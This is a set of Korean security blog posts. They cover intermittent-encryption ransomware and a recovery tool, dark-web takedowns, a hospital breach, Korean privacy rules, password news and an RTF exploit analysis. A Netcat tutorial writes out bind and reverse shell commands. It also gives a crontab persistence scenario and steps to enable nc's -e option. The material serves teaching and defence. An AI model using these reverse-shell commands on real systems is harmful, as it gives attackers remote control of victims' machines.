1. 개요: 간헐적 암호화

- 최근 랜섬웨어 공격자들은 간헐적 암호화 전략을 사용

- 간헐적 암호화란 암호화 속도를 높이기 위해 파일의 가장 앞부분 혹은 뒷부분만 암호화하는 것

> 블랙캣(BlackCat), 콘티(Conti), 로얄(Royal), 플레이(Play) 등이 이 전략을 활용

 

- 21년 새롭게 등장한 락파일(LockFile) 랜섬웨어를 유포하기 위해 간헐적 암호화 사용 [1][2][3]

> 파일의 첫 부분 중 일부는 암호화하지 않고, 16바이트마다 한번씩 암호화

> 텍스트 문서와 같은 파일 종류는 부분적으로 읽을 수 있고, 파일 크기 등 통계적으로 원본과 유사

> 통계 분석을 사용해 콘텐츠 검사에 의존하는 랜섬웨어 탐지 소프트웨어 우회 가능

 

- 간헐적 암호화의 장단점

> 장점: 암호화 효율(속도)을 높여 보다 많은 파일을 암호화, 높은 탐지 기술 회피력

> 단점: 부분적인 암호화로 복호화 가능성이 높음

 

2. 화이트피닉스(White Phoenix) [4][5]

- 사이버 보안 기업 사이버아크는 간헐적 암호화의 특징에 초점을 맞춰 파일 복호화 도구 화이트피닉스 발표

> 간헐적 암호화된 파일의 경로와 복호화 될 파일을 저장할 경로만 지정하면 됨

 

- 간헐적 암호화로 암호화된 파일 중 pdf, docx, docm, xlxm, xltx, extm, pptx, pptm, ptox, zip 등의 파일들을 꽤나 정확하게 복구

> 공격자들이 PDF의 헤더 부분만을 삭제했다고(암호화 했다고) 다음과 같이 상황을 가정

> 오리지널 파일 구조: "Head 123, Body 456, Footer 789"

> 암호화된 파일 구조: "head 12, body 456, footer 789"

> 따라서, 원본을 유추해 복구하는 것이 상대적으로 수월하다는 것

 

- 현재는 주로 블랙캣이 암호화 한 문서 파일들을 위주로 복호화 기능을 발휘

> 블랙캣은 6가지 암호화 모드를 제공: 파일 헤더 암호화, 파일 일부 암호화, 파일 전체 암호화 등

> 플레이, 킬린(Qilin), 비안리안(BianLian), 다크빗(DarkBit)과 같은 랜섬웨어 피해자 역시 어느 정도 도움을 얻을 수 있을 것

화이트피닉스(White Phoenix) 
지원 목록
랜섬웨어 - BlackCat/ALPHV
- Play ransomware
- Qilin/Agenda
- BianLian
- DarkBit
파일 확장자 - PDF
- Word 포맷: docx, docm, dotx, dotm, odt
- Excel 포맷: xlsx, xlsm, xltx, xltm, xlsb, xlam, ods
- PowerPoint 포맷: pptx, pptm, ptox, potm, ppsx, ppsm, odp
- Zip

 

3. 대응방안

① 다중계층방어 보안프로그램 도입

> 랜섬웨어는 하나의 보안기술로는 완벽하게 방어하기 어려움

> 네트워크, End-Point 등에 걸친 다단계 방어가 필요

 

② 정기적인 패치 및 업데이트 적용

> 랜섬웨어는 소프트웨어의 취약점을 악용해 침투

> 소프트웨어 및 펌웨어를 최신 버전으로 유지

 

③ 데이터 백업

> 신뢰할 수 있는 매체나 클라우드를 통해 데이터 백업

 

④ 기본 보안 수칙 준수

> 출처가 불분명한 파일 다운 및 실행 금지/주의

> 메일 내 첨부파일 실행 금지/주의

> USB 등의 외부 저장 매체 통제/비활성화 및 보안성 검토 후 사용

> 보안 교육 수행

 

4. 참고

[1] https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html
[2] https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/
[3] https://www.ic3.gov/Media/News/2021/210825.pdf
[4] https://www.cyberark.com/resources/threat-research-blog/white-phoenix-beating-intermittent-encryption
[5] https://github.com/cyberark/White-Phoenix
[6] https://www.boannews.com/media/view.asp?idx=117997&page=1&kind=1 

 

 

 

'랜섬웨어 > 기타' 카테고리의 다른 글

RansomLooker  (0) 2023.10.13

1. 다크웹 해킹 포럼 폐쇄

1. 개요

- 미국 FBI 및 국제 공조로 다크웹 해킹 포럼이 연속적으로 폐쇄

 

2. 주요내용

- BreachForums 폐쇄

> 22년부터 23년까지 운영된 다크웹 해킹 포럼 (유출 정보 거래)

※ 22년 국제 사법 기관들의 공조로 폐쇄된 레이드포럼(RaidForums)의 대안 및 후속적인 역할 수행

> 주로 거래된 정보는 계좌 정보, 주민번호, 이메일 주소, 유출한 데이터베이스, 침해된 계정 정보 등

> 23년 3월 FBI의 수사로 포럼 운영자 검거 및 포럼 폐쇄

 

- Genesis Market 폐쇄

> 17년부터 23년까지 운영된 다크웹 해킹 포럼 (유출 정보 거래)

> 주로 거래된 정보는 쿠키, 크리덴셜 정보 등

> 23년 4월 국제 사법 기관들의 공조로 관련 인물 검거 및 포럼 폐쇄 

 

- Try2Check 폐쇄

> 05년부터 23년까지 운영된 다크웹 해킹 포럼 (카드 정보의 유효성 확인)

> 훔치거나 유출된 카드 정보를 대량으로 구매한 자들이 해당 정보 중 아직 활용 가능한 정보를 확인하기 위해 사용

> 23년 5월 국제 사법 기관들의 공조로 포럼 폐쇄 (운영자는 특정했으나 러시아에 거주 중이라 아직 검거되지 않음)

 

- 13곳의 DDoS 대행 서비스 폐쇄

>  DDoS 대행 서비스를 부터(Booter) 혹은 스트레서(Stresser)라 부름

> 공격자들은 다른 공격과 섞어 대행 서비스를 이용

> 23년 5월 국제 사법 기관들의 공조로 13곳 폐쇄

 

- 기타

> 록빗(LockBit) 랜섬웨어 그룹의 지도자급 인물 중 한 명이 캐나다에서 채포

> 레빌(REvil) 랜섬웨어 그룹의 일원 한 명이 폴란드에서 체포

> 랩서스(Lasus$) 해킹 그룹의 일원 한 명이 브라질에서 체포

 

3. 기타사항

- 다크웹 등을 통한 계정 정보 유출이 지속적으로 발생

> 기업들의 적극적인 조치(비밀번호 변경, 2차 인증 등) 필요

> 정보 유출 방지를 위해 최신 업데이트 적용, 취약점 분석 및 조치, 보안 교육 등 필요

 

- 폐쇄된 다크웹 해킹 포럼을 대체할 포럼이 지속적으로 생성되는 중으로 주의 필요

> BreachForums의 폐쇄로 어나니머스 출신이라 밝힌 한 인물이 kkksecforum 다크웹 포럼 개설을 트위터를 통해 알림

> 폐쇄된 13곳의 DDoS 대행사 중 10곳은 지난 22.12에 폐쇄된 서비스가 부활한 것

 

2. 구글, 다크웹 스캔 서비스 제공

1. 개요

- 구글에서 미국 사용자들을 대상으로 다크웹 스캔 서비스를 제공

 

2. 주요내용

- 미국 내 구글 원(Google One) 서비스 사용자들에게만 제공 중

- 다크웹을 스캔해 이름, 주소, 이메일 주소, 전화번호, 주민등록번호 등이 유통되고 있는지 확인할 수 있게 해 주는 서비스

- 다크웹에 정보가 있는 것으로 보이는 사용자에게는 자동으로 보고서와 권장 조치 사항들이 전달

 

3. 기타사항

- 관련 보고서를 곧 공개할 예정

'개인정보보호(법) > DDW' 카테고리의 다른 글

DDW 동향  (1) 2024.02.08
DDW 동향  (0) 2023.12.13
DDW 동향  (0) 2023.07.31
DDW 동향  (0) 2023.06.29
DDW 동향  (0) 2023.04.03
침해 사고 정보
일자 2021/06/05 ~ 2021/06/11
침해 정보 - 환자정보: 병원등록번호, 성명, 생년월일, 성별, 나이, 진료과, 진단명, 검사일, 검사명, 검사결과
- 직원정보: 사번, 성명, 주민번호, 거주지연락처, 연락처, 이메일, 근무부서정보, 직급연차정보, 임용퇴직정보, 휴복직정보, 자격면허정보 등
특징 파일 업로드 취약점을 이용한 웹쉘 업로드로
피해크기 - 약 83만명의 개인정보
> 환자 81만여명
> 전·현직 직원 1만7000여명 
침해 사고 분석
경위 21.05 ~ 21.06 국내·외에 소재한 서버 7대를 장악해 공격 기반 마련
> 국내 4대·해외 3대

② 웹쉘 업로드
> 내부망에서 사용하기 위한 계정 생성
> ID/PW : default/다치지 말라

③ 공유폴더와 연결된 서울대병원 내부망에 침입

④ 병리검사 서버에서 개인정보 탈취
> 81만명의 진료정보를 탈취

⑤ 내부망 전자사보DB에서 개인정보 탈취
> 1만 7000여명의 직원정보 탈취
> 이중 2000명의 정보는 실제 유출된 것으로 확인
원인 ① 파일 업로드가 가능한 병원 내부망의 보안 취약점을 활용
> 웹서버에 명령을 실행해 관리자 권한을 획득할 수 있는 웹쉘이 필터링 되지 않고 업로드 됨
조치 ① 21.07.06 서울대병원 침해 사실 최초 인지 및 공지 게시
- 교육부/보건복지부/개인정보보호위원회/사이버수사대 등에 신고후 조사를 진행
- 서울대병원의 후속조치
> 해당 IP 및 접속 경로 차단
> 서비스 분리
> 취약점 점검 및 보완조치
> 모니터링 강화
> 사용자 PC 비밀번호 변경
> 개인정보보호위원회 등 관련 유관기관 신고
> 병원에 등록된 휴대전화번호로 개인정보 유출 사실 개별 연락 수행

② 23.05.10 경찰청 발표
- 피해기관에 침입 및 정보 유출 수법과 재발 방지를 위한 보안 권고사항을 설명
- 관계기관에 북한 해킹조직의 침입 수법·해킹 도구 등 관련 정보를 제공
> 국가 배후의 조직적 사이버 공격에 대해 치안 역량을 총동원하여 적극적으로 대응
> 관계기관 정보공유 및 협업을 통해 추가적인 피해를 방지
> 사이버 안보를 굳건히 지키기 위해 노력할 계획

- 경찰
> 개인정보보호위원회 의결 결과에 따라 병원 개인정보 보호책임자 입건 여부 검토 예정

③ 23.05.10 개인정보보호위원회
- 전체회의를 통해 서울대학교병원에 과징금 7,475만원 부과 의결
> 서울대병원이 이미 널리 알려진 해킹공격(웹쉘)을 탐지하고, 방어할 관리적·기술적 조치가 미비했다고 판단
> 공공기관 최초로 과징금을 부과
기타 ① 기존 북한발로 확인된 다수 사건과 비교 결과 해당 사건 또한 북한발(김수키, Kimsuky)로 확인
- 기존 사례와 동일한 사항
> 공격 근원지 IP, IP 주소 세탁 기법: 과거 북한 해킹 조직이 사용했던 IP 포함
> 인터넷 사이트 가입정보, 시스템 침입·관리 수법: 해킹용 서버의 사용자 이름·이메일이 과거 북한 해킹조직이 사용한 정보
> 북한어휘 사용: 내부망에 생성한 계정의 비밀번호가 한글 자판으로 '다치지 말라'

② 이승운 경찰청 사이버테러수사대장
- 해킹 조직이 병리검사가 저장됐던 서버를 해킹
- 고위 인사의 개인정보를 빼내기 위한 목적으로 추정

③ 남석 개인정보위 조사조정국장
> 공공기관의 경우 다량의 개인정보를 처리
> 작은 위반행위로도 심각한 피해로 이어질 가능성이 큰 만큼 담당자들의 세심한 주의가 필요

④ 의료 분야 외 다른 분야 또한 주요 정보통신망에 대한 침입 시도가 지속될 것으로 예상
- 최신 보안 업데이트 적용
- 불법적인 접속시도에 대한 접근통제
- 개인정보를 포함한 중요 전산 자료 암호화 등 보안 시스템과 보안정책 강화 권고

 

'침해사고 > 개인정보' 카테고리의 다른 글

유안타증권 개인정보 유출  (0) 2023.07.21
해병대 개인정보 유출  (1) 2023.06.16
인터파크 개인정보 유출  (0) 2023.04.16
한국남부발전 개인정보 유출  (0) 2022.08.31
빗썸 개인정보 유출  (0) 2022.08.24

1. Netcat (nc)

- TCP 또는 UDP를 사용하여 네트워크 연결을 읽거나 기록하는 컴퓨터 네트워킹 유틸리티

- UNIX의 cat과 유사하며, cat 명령으로 파일을 읽거나 쓰듯이 NC는 Network Connection에 읽거나 씀

- 스크립트와 병용하여 network에 대한 debugging, testing tool로써 매우 편리하지만 반면 해킹에서도 자주 사용

 

1.1 주요 옵션

옵션 설명
-l listen 모드로 port 오픈
-L 영구 리스너 생성 (Windows만 작동)
-u Netcat UDP 모드로 전환 (기본값 TCP)
-p local port 지정
-e 연결 후 수행 할 작업
※ 서버에서 -e 옵션 지정 시 서버에서 해당 작업이 수행
 클라이언트에서 -e 옵션 지정 시 클라이언트에서 해당 작업이 수행
-s addr local ip address 지정
-n 호스트 네임과 포트를 숫자로만 입력
-z local ip address 지정
-v verbosity를 증가시키며, 더 많은 정보를 얻을 수 있음
-w secs 시간 종료 값을 정의

 

1.2 바인드쉘

- 일반적인 연결 상태로, 클라이언트가 서버에 접속

- 서버: nc -lnvp 1234 -e /bin/bash
- 클라이언트: nc <서버 IP> 1234

 

[사진 1] 바인드쉘 예시

 

1.3 리버스쉘

- 바인드쉘과 반대로 서버가 클라이언트에 접속, -e 옵션에 의해 클라이언트에서 작업이 수행됨

> 예시의 경우 클라이언트의 /bin/bash가 실행

> 공격자의 PC가 서버가되고, 피해자의 PC가 클라이언트가 되어 명령을 실행

- 서버: nc -lnvp 1234
- 클라이언트: nc <서버 IP> 1234 -e /bin/bash

 

- 일반적으로 방화벽은 네트워크 최상단에 설치되어 외부에서 내부로 들어오는 연결차단

> 반대로 내부에서 외부로 나가는 연결에 대해서는 상대적으로 허용하는 경우가 많음

> 이를 이용해 공격자는 공격 PC를 서버로 동작시킨 뒤, 피해 PC에서 명령 실행 및 공격 PC로 접근해 쉘을 획득

 

- 일반적인 리버스쉘 시나리오는 다음과 같음

① 공격자는 내부 네트워크에 침입한 후 무차별대입공격으로 root 계정 탈취

② 반복적인 침입을 위해 root 계정을 이용해 root 권한을 가지는 일반 사용자 계정 생성

③ netcat 프로그램을 이용한 리버스쉘 연결 작업을 cron table에 등록(/etc/crontab)

④ 공격자는 주기적으로 shell을 획득해 추가 명령 수행

 

[사진 2] 리버스쉘 예시

 

2. -e 옵션

- 앞서 살펴보았듯이 -e 옵션은 연결을 생성한 후 실행할 명령 등의 작업을 지정함

- 침해 상황을 가정해 nc를 통해 리버스쉘 연결을 시도한 결과 -e 옵션이 유효하지 않다고 확인

[사진 3] 유효하지 않은 -e 옵션

 

- 구글링을 해보니 비활성화된 (또는 지원하지 않는) 버전의 nc를 사용한 결과라고 함

> 따라서, -e 옵션을 지원하는 nc 버전 (netcat-traditional)을 설치하고, 해당 버전으로 설정해야 함

# sudo apt-get install -y netcat-traditional
# sudo update-alternatives --config nc

 

- 두 번째 명령 실행 결과를 확인해보면 현재 /bin/nc.openbsd 버전을 사용하고 있는 것으로 확인 됨

> 설치한 netcat-traditional (nc.traditional)으로 변경

[사진 4] sudo update-alternatives --config nc 결과 비교

 

- 변경 후 -e 옵션을 실행하면 정상적으로 리버스쉘이 생성됨

[사진 5] 리버스쉘 생성

1.보호조치 기준 개요

- 개인정보의 안전성 확보조치 기준개인정보의 기술적ㆍ관리적 보호조치 기준으로 구분할 수 있음

구분 개인정보의 안전성 확보조치 기준 개인정보의 기술적ㆍ관리적 보호조치 기준
규제기관 개인정보보호위원회
대상자 개인정보처리자 정보통신서비스 제공자 등
고시 근거 개인정보보호법
- 제23조 제2항 (민감정보의 처리 제한)
- 제24조 제3항 (고유식별정보의 처리 제한)
- 제29조 (안전조치의무)
개인정보보호법
- 제29조 (안전조치의무)
개인정보보호법 시행령
- 제21조 (고유식별정보의 안전성 확보 조치)
- 제30조 (개인정보의 안전성 확보 조치)
개인정보보호법 시행령
- 제48조의2 (개인정보의 안전성 확보 조치에 관한 특례)
처벌 규정 - 안전성 확보에 필요한 조치를 하지 않은 자 (제29조 위반)
- 3천만원 이하 과태료 (제75조 제2항 제6호)
- 안전성 확보에 필요한 조치를 하지 않아서 개인정보가 분실ㆍ도난ㆍ유출ㆍ위조ㆍ변조 또는 훼손당한 자 (제29조 위반)
- 2년 이하의 징역 또는 2천만원 이하 벌금 (제73조 제1항)
- 이용자의 개인정보를 분실ㆍ도난ㆍ유출ㆍ위조ㆍ변조 또는 훼손한 경우로서 제29조의 조치(내부관리계획 수립에 관한 사항 제외)를 하지 않은 자 (제29조 위반)
- 위반행위와 관련한 매출액의 100분의 3 이하 과징금 (제39조의15 제1항 제5호)

 

- 기준별 보호조치 요약

구분 개인정보처리자 정보통신서비스 제공자등
세부기준 개인정보의 안전성 확보조치 기준 개인정보의 기술적ㆍ관리적 보호조치 기준
내부 관리계획의
수립ㆍ시행
1만 명 미만의 정보주체에 관한 개인정보를 보유한 소상공인, 단체, 개인 적용 제외 사업 규모에 따른 예외 규정 없음
접근통제 개인정보처리시스템에 대한 접근권한 부여 등의 내역 기론 보관 의무: 최소 3년간 보관 개인정보처리시스템에 대한 접근권한 부여 등의 내역 기록 보관 의무: 최소 5년간 보관
비밀번호 설정 관련 세부 기준을 명시하지 않음
※ 해설서 기준
- 10자리 이상: 영문 대문자와 소문자, 특수문자, 숫자 중 1종류 이상 조합
- 8자리 이상: 영문 대문자와 소문자, 특수문자, 숫자 중 3종류 이상 조합
개인정보취급자의 비밀번호 작성 규칙을 구체적 명시
- 10자리 이상: 영문, 특수문자, 숫자 중 2종류 이상 조합
- 8자리 이상: 영문, 특수문자, 숫자 중 3종류 이상 조합
외부 인터넷망 차단 의무화 규정 없음 사업자, 개인정보취급자 기준에 해당하는 자의 PC 등에 대한 외부 인터넷망 차단 의무화
고유식별정보의 경우 연 1회 이상 취약점 점검 -
암호화 대상
(개인정보처리시스템
저장 시)
- 비밀번호 (일방향 암호화)
- 고유식별정보
- 비밀번호 (일방향 암호화)
- 고유식별정보
- 신용카드번호
- 계좌번호
접속기록 접속기록 범위: 개인정보취급자 등 계정, 접속일시, 접속지 정보, 처리한 정보주체정보, 수행업무 등 접속기록 범위: 식별자, 접속일시, 접속지를 알 수 있는 정보, 수행업무 등
개인정보 처리시스템 접속기록은 최소 1년 이상 보관
5만 명 이상 정보주체의 개인정보를 처리하거나 고유식별정보 또는 민감정보 처리 개인정보처리시스템의 경우 최소 2년 이상 보관
개인정보 처리시스템 접속기록은 최소 1년 이상 보관
기간통신사업자는 최소 2년 이상 보관

 

- 개인정보의 안전성 확보조치 기준 유형 분류 기준

유형 유형1(완화) 유형2(표준) 유형3(강화)
적용 대상 1만명 미만의 정보주체에 관한 개인정보를 보유한 소상공인, 단체, 개인 - 100만명 미만의 정보주체에 관한 개인정보를 보유한 중소기업
- 10만명 미만의 정보주체에 관한 개인정보를 보유한 대기업, 중견기업, 공공기관
- 1만명 이상의 정보주체에 관한 개인정보를 보유한 소상공인, 단체, 개인
10만명 이상의 정보주체에 관한 개인정보를 보유한 대기업, 중견기업, 공공기관
100만명 이상의 정보주체에 관한 개인정보를 보유한 중소기업, 단체
적용 기준 - 제5조 : 제2항부터 제5항까지
- 제6조 : 제1항, 제3항, 제6항 및 제7항
- 제7조 : 제1항부터 제5항까지, 제7항
- 제8조, 제9조, 제10조, 제11조, 제13조
- 제4조 : 제1항제1호부터 제11호까지 및 제15호, 제3항부터 제4항까지
- 제5조
- 제6조 : 제1항부터 제7항까지
- 제7조 : 제1항부터 제5항까지, 제7항
- 제8조, 제9조, 제10조, 제11조, 제13조
- 제4조부터 제13조까지

 

- 개인정보의 기술적ㆍ관리적 보호조치 기준 적용 대상자

구분 기준이 적용되는 경우
기준
적용
대상자
정보통신
서비스
제공자등
정보통신
서비스
제공자
전기통신
사업자
기간통신사업자
(전기통신사업법 제5조 제2항)
음성․데이터 등의 송․수신, 주파수 할당․제공, 전기통신회선설비임대역무, 기간통신역무제공 등
부가통신사업자
(전기통신사업법 제5조 제3항)
기간통신사업자의 전기통신회선설비를 임차하여 기간통신역무 외의 전기통신역무 제공 등
영리를 목적으로
전기통신사업자의 전기통신역무를 이용해
정보를 제공하거나 매개하는 자
인터넷 홈페이지 등을 운영하는 영리를 목적으로 하는 사업자 등
정보통신서비스 제공자로부터 법 제17조에 따라
이용자의 동의를얻어 개인정보를 제공받은 자
업무제휴 등을 위해 이용자의 동의를 얻어 개인정보를 제공받은 자 등
방송사업자 (개인정보 보호법 제39조의14) 시청자의 개인정보를 수집․이용 또는
제공하는 자 등
(IPTV 사업자는 직접 적용)
수탁자 (개인정보 보호법 제26조) 수탁자는 법 제29조의 기술적․관리적
보호조치 규정을 준용 등
다른 법률에서 이 법의 적용을 받는 자 다른 법률에서 특별히 규정된 때 등

 

참고

 

(개인정보보호위원회)개인정보의안전성확보조치기준

 

www.law.go.kr

 

KISA 한국인터넷진흥원

 

www.kisa.or.kr

 

(개인정보보호위원회)개인정보의기술적·관리적보호조치기준

 

www.law.go.kr

 

KISA 한국인터넷진흥원

 

www.kisa.or.kr

 

 

휴대폰에 업데이트 알람이 떠서 확인해보니 보안 대응 업데이트 였다. 조금 찾아봤더니 작년 iOS16 공개와 함께 처음 선보였다고 한다. 정규 업데이트와는 별개로, 장치와 소프트웨어의 보안 문제를 개선 또는 수정하는 내용을 담고 있다고 한다. 그래서 그런지 업데이트 크기가 약 100MB 였고, 순식간에 완료가 되었다.

 

사파리 웹 브라우저와 Webkit 프레임 워크 스택 또는 기타 중요한 시스템 라이브러리에 대한 개선 사항이 업데이트되는 것이라고 한다. 또한 악용되었거나 존재한다고 보고된 문제 등 일부 보안 문제를 더 빠르게 완화하는 데에도 사용할 수 있다고 한다.

 

설정 > 소프트웨어 업데이트 > 자동 업데이트 > 보안 대응 및 시스템 파일에서 비활성화할 수 있다. 하지만, 보안과 개인정보를 안전하게 유지하기 위해서는 해당 기능을 활성화하고, 주기적으로 업데이트를 확인하고 적용하는 것이 필요할 것 같다. 또한, 취지에서도 알 수 있듯이 소프트웨어 업데이트 사이에 중요한 보안 개선 사항을 설치하는 기능인만큼 활성화해 두는 것이 좋을 것 같다.

1. 분석 도구

1.1 Virus Total [1]

- 무료로 파일 검사를 제공하는 웹사이트로, 파일, URL 내의 바이러스를 검사해주는 사이트 (IP 조회도 가능)

 

1.2 HxD [2]

- 파일에 저장된 HEX(16진수) 값을 읽고 수정하는데 이용

 

1.3 rtfdump.py [3][4]

- Github에서 다운받을 수 있는 파이썬으로 작성된 RTF 파일을 분석하는데 사용되는 Open Source

 

1.4 oledump.py [8]

- OLE 파일을 분석하는 프로그램

 

2. 분석

 Virus Total 조회

- 실습에서 진행한 RTF 파일을 Virus Total에서 조회한 결과는 다음과 같음

> 58개의 벤더사 중 39개의 벤더사가 악성 파일로 탐지

> 탐지명을 확인해보면 CVE-2017-0199와 관련된 것임을 알 수 있음

[사진 1] Virus Total 조회 결과

 

② 파일 속성 및 HxD 조회

- 파일 속성과 HxD 확인 결과 해당 파일이 RTF 파일임을 확인

> RTF 파일은 파일 시그니처7B 5C 72 74 66 31 ({rtf1)를 가짐 [5]

[사진 2] 파일 속성 및 HxD 확인 결과

 

③ rtfdump.py 파일 덤프

- 먼저 -m 옵션을 사용해 rtfdump.py의 사용법에 대해 확인

[사진 3] rtfdump.py -m 결과

 

- yeahhub.rtf 파일 덤프 결과 문서에 포함된 객체들이 조회됨

> [사진 5]를 통해 RTF 문서에서 원격 객체와 연결을 하기위해 "objautlink"를 사용하며, 그 중 "objdata"에 OLE 객체를 포함하고 있는것을 확인 [6]

> objautlink ⊃ objdata ⊃ OLE 객체로 정리함

※ [사진 4]에서 첫 번째 열의 숫자는 rtfdump에서 파생된 출력 값으로 파일의 일부가 아님

[사진 4] objdata

 

[사진 5] RTF 내 objdata 객체

 

- 분석 후 추가 구글링 결과 rtfdump.py의 경우 아래 명령으로 문서에 포함된 OLE 객체를 찾을 수 있다고 확인됨

rtfdump.py -f O 파일명

 

- [사진 4]에서 확인된 objdata의 값을 -s 옵션으로 확인한 결과 "01050000 02000000"이 확인

> "01050000 02000000"는 각각 01050000 OLE 버전 정보, 02000000 임베디드 객체를 뜻함 [7]

> -H 명령을 추가해 확인하면 더욱 명확히 OLE 객체임을 알 수 있음

[사진 6] -s 10 명령 결과

 

[사진 7] -H 추가 결과

 

④ oledump.py

- [사진 7]의 결과에서 두 가지 옵션 추가 및 "|"를 사용해 oledump.py의 입력으로 전달

> -E: 포함된 객체 덤프

> -d: 출력된 내용 덤프

[사진 8]에서 첫 번째 열의 숫자는 oledump에서 파생된 출력 값으로 파일의 일부가 아님

[사진 8] 덤프 파일 출력

 

- -s 옵션으로 각각의 스트림을 확인한 결과 첫 번째 스트림에서 악성 URL 확인

[사진 9] 문자 스트림 출력

 

- [사진 9]에서 확인된 악성 URL로 HTA 파일을 요청하고, HTA 파일에 포함된 리버스쉘 생성 명령이 실행

[사진 10] 패킷 일부

 

3. 참고

[1] https://www.virustotal.com/gui/home/upload
[2] https://mh-nexus.de/en/hxd/
[3] https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py
[4] https://blog.didierstevens.com/2016/07/29/releasing-rtfdump-py/
[5] http://forensic-proof.com/archives/300
[6] https://www.mcafee.com/blogs/other-blogs/mcafee-labs/an-inside-look-into-microsoft-rich-text-format-and-ole-exploits/
[7] https://github.com/houjingyi233/office-exploit-case-study/blob/master/CVE-2017-11882%26CVE-2018-0802%26CVE-2018-0798/cve-2018-0802%20poc%20with%20comments.rtf
[8] https://github.com/DidierStevens/DidierStevensSuite/blob/master/oledump.py

요약 - 매해 5월 첫째주 목요일은 세계 패스워드의 날(World Password Day)
※ 세계 패스워드의 날: 전세계적으로 올바른 암호 보안의 중요성을 알리고 강력한 패스워드를 통한 보안 강화를 독려하기 위해 기념
- 패스워드 관리는 여전히 허술하며, 보안규정이 있지만 제대로 관리되지 못하고 있는 실정
내용 - 현 패스워드에는 여러 문제점이 있으며 좀더 효율적인 패스워드 관리가 필요
> 아이디와 암호를 입력 시: 누군가가 엿볼 수 있음
> 특정 주기마다 암호 변경: 책상 위에 적어 놓거나 기억하기 번호를 사용해 변경 의미 없음
> 사용하는 서비스 마다 동일한 비밀번호 사용: 하나의 비밀번호 탈취 시 모든 서비스에 영향
> 비밀번호 공유 : 동료 등에게 암호를 알려주다 보면 규정을 준수하기조차 쉽지 않음

- 관련 사례
① 구글 ‘패스키(passkeys)’ 기술을 출시 발표
> 컴퓨터와 휴대전화 등에서 비밀번호를 입력하지 않아도 관련 앱이나 사이트를 이용할 수 있음
※ 계정 이용자가 패스키를 사용하면 구글은 로그인을 위한 암호 또는 로그인 후 2단계 인증을 요구하지 않음
> 앱이나 사이트 등에 비밀번호를 입력하지 않고, 얼굴 인식·지문·화면 잠금 개인 식별번호(PIN) 등을 이용해 로그인할 수 있는 기술
 보안을 위해 공유 기기에 패스키를 생성해서는 안 된다고 강조
> 기존의 비밀번호의 위험(피싱 공격, 해킹 등)으로부터, 안전하며, 클라우드를 통해 모든 기기에서 사용자 인증이 동기화 됨
> 22.09 애플은 운영체제(iOS)에 패스키 지원 기능을 지원
> 22.10 페이팔도 iOS에서 패스키를 지원

② 오토패스워드
> 사용자가 아이디를 입력하면 사용자를 대신해 자동으로 비밀번호 입력
> 사용자는 휴대폰 등을 사용해 비밀번호가 올바르게 입력 되었는지 확인 후 로그인
> 일회용 패스워드 기술을 이용하였으며, 비밀번호가 매번 새롭게 생성되 도용될 수 없고, 암기 불필요
> 자동으로 입력된 비밀번호와 휴대폰 등에서 확인한 비밀번호 비교를 통해 서비스 및 사용자 인증 진행

③ MFA, 생체인증 등
> MFA(멀티 팩터 인증) 푸시 알림을 계속 보내 상대방을 지치게 만들어 우발적으로 로그인 승인 버튼을 누르게 만드는 공격 (MFA 피로 공격_MFA Fatigue Attacks) 등 문제 존재
> 안면 인식, 지문 기반 인증 등의 생체인증 또한 오류가 존재
기타 - 자동화된 통합 관리 솔루션 필요
> 단일 디지털 아이덴티티를 통해 적절한 사용자에게 적절한 수준의 액세스가 할당되도록 보장되어야 함
> 직원과 비직원 모두의 액세스 수준을 제어하여 조직 전체에 대한 가시성을 확보하고, 권한이 부여되지 않은 정보나 시스템에 액세스하려는 불법적인 시도를 사전에 차단

- 궁극적으로 기업은 사물인터넷(IoT) 및 로봇프로세스자동화(RPA) 기술에 대한 의존도 증가와 디지털 업무 환경의 성장에 힘입어 폭발적으로 증가하는 디지털 아이덴티티들을 관리
> 기업이 전반적인 사이버 보안 태세를 강화하고 비밀번호 관련 위협을 방지하려면 결국은 통합된 아이덴티티 관리가 관건

 

보안뉴스

 

오늘은 ‘세계 패스워드의 날’... 하지만 패스워드 관리는 여전히 ‘허술’

매해 5월 첫째주 목요일은 ‘세계 패스워드의 날(World Password Day)’로, 올해는 5월 4일이다. 세계 패스워드의 날은 전세계적으로 올바른 암호 보안의 중요성을 알리고 강력한 패스워드를 통한 보

www.boannews.com

 

"비밀번호 필요없다"…구글 새 로그인 방식 도입

[서울=뉴시스]한휘연 인턴 기자 = 비밀번호 없이 새로운 방식으로 구글 계정 로그인이 가능하게 됐다

www.newsis.com

 

세일포인트 “5월4일은 세계 비밀번호의 날··· 통합 아이덴티티 관리 중요”

...

www.ddaily.co.kr

 

+ Recent posts